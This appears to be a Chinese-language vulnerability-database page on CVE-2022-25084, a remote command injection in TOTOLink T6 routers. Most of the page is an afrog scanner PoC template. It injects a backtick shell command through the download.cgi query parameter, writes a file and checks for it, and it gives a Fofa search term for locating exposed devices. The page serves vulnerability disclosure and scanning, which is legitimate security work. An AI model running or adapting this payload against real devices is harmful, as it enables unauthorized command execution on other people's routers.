CVE-2022-25084: TOTOLink T6 V5.9c.4085_B20190428 Command Injection

日期: 2025-09-01 | 影响软件: TOTOLink T6 | POC: 已公开

漏洞描述

TOTOLink 多个设备 download.cgi文件存在远程命令执行漏洞，攻击者通过构造特殊的请求可以获取服务器权限 Fofa: "totolink"

PoC代码[已公开]

id: CVE-2022-25084

info:
  name: TOTOLink T6 V5.9c.4085_B20190428 Command Injection
  author: zan8in
  severity: critical
  description: |
    TOTOLink 多个设备 download.cgi文件存在远程命令执行漏洞，攻击者通过构造特殊的请求可以获取服务器权限
    Fofa: "totolink"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25084
    - http://wiki.peiqi.tech/wiki/iot/TOTOLink/TOTOLink%20%E5%A4%9A%E4%B8%AA%E8%AE%BE%E5%A4%87%20download.cgi%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2022-25084.html

set:
  txt: randomLowercase(6)
rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/downloadFlile.cgi?payload=`ls>../{{txt}}.txt`
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /{{txt}}.txt
    expression: response.status == 200 && response.body.bcontains(b'downloadFlile.cgi') && response.body.bcontains(b'cstecgi.cgi')
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-25084.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

CVE-2022-0342: Zyxel authentication bypass patch analysis POC

CVE-2022-0434: WordPress Page Views Count <2.4.15 - SQL Injection POC

CVE-2022-0540: Atlassian Jira - Authentication bypass in Seraph POC

CVE-2022-0656: uDraw <3.3.3 - Local File Inclusion POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446）无POC